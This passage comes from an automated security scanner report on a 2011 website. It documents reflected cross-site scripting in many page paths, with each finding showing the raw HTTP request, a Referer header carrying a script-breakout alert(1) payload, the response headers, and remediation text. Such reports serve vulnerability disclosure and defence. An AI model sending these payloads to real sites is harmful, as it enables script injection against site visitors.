Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f883b</script><script>alert(1)</script>f66a86dc852
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:53 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60630
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 674ae</script><script>alert(1)</script>7e706d5e99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housekeeping/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=674ae</script><script>alert(1)</script>7e706d5e99
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71853

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Housekeeping - How To Information | eHow.com</tit ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca85e</script><script>alert(1)</script>47ffba28361 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ca85e</script><script>alert(1)</script>47ffba28361
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27515
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 820fe</script><script>alert(1)</script>4ab6b57dae1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_13299_know-someone-lying.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=820fe</script><script>alert(1)</script>4ab6b57dae1
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 81521

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Know if Someone Is Lying | eHow.com</title ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65c19</script><script>alert(1)</script>ba2639b56db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2053743_make-crock-pot-pork-roast.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=65c19</script><script>alert(1)</script>ba2639b56db
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75840

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Make a Crock Pot Pork Roast | eHow.com</ti ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32d36</script><script>alert(1)</script>a207535244d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2077554_repair-cracks-dashboard.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=32d36</script><script>alert(1)</script>a207535244d
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75147
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Repair Cracks in a Dashboard | eHow.com</t ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0a9b</script><script>alert(1)</script>4d2f73e4a4f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2113353_end-sibling-feuds.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c0a9b</script><script>alert(1)</script>4d2f73e4a4f
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87612
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to End Sibling Feuds | eHow.com</title> <m ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4913</script><script>alert(1)</script>e5a0ba7fb0e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2304056_cut-shirt-make-cuter.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b4913</script><script>alert(1)</script>e5a0ba7fb0e
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76882
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Cut a T Shirt To Make It Cuter | eHow.com< ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c400e</script><script>alert(1)</script>9ed15557f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_3815_minutes-business-meeting.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c400e</script><script>alert(1)</script>9ed15557f52
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91165
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Take Minutes at a Business Meeting | eHow. ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52b20</script><script>alert(1)</script>75e36263ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4469163_edit-pdf-document.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=52b20</script><script>alert(1)</script>75e36263ac
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78825
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Edit a PDF Document | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9c68</script><script>alert(1)</script>58bb3213787 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4474239_make-graph-using-excel.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f9c68</script><script>alert(1)</script>58bb3213787
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94464
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Graph Using Excel | eHow.com</title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7370</script><script>alert(1)</script>1fdfe884e13 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4924781_open-pub-file-mac.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d7370</script><script>alert(1)</script>1fdfe884e13
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73379
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Open a Pub File on a Mac | eHow.com</title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de30</script><script>alert(1)</script>08c31b04285 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5073161_convert-wps-file-extension.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8de30</script><script>alert(1)</script>08c31b04285
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75348
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Convert a WPS File Extension | eHow.com</t ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 792c3</script><script>alert(1)</script>e4edbcebfeb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5215115_change-startup-programs-windows-7.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=792c3</script><script>alert(1)</script>e4edbcebfeb
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82260
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Change Startup Programs in Windows 7 | eHo ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c9ba</script><script>alert(1)</script>fd2c9cc4bf2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5381925_make-roof-rake.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=2c9ba</script><script>alert(1)</script>fd2c9cc4bf2
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74669
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Roof Rake | eHow.com</title> <me ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42857</script><script>alert(1)</script>6ac0b75544c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5521182_avoid-seasonal-affective-disorder-sad.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=42857</script><script>alert(1)</script>6ac0b75544c
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87570
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Avoid SAD | eHow.com</title> <meta char ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
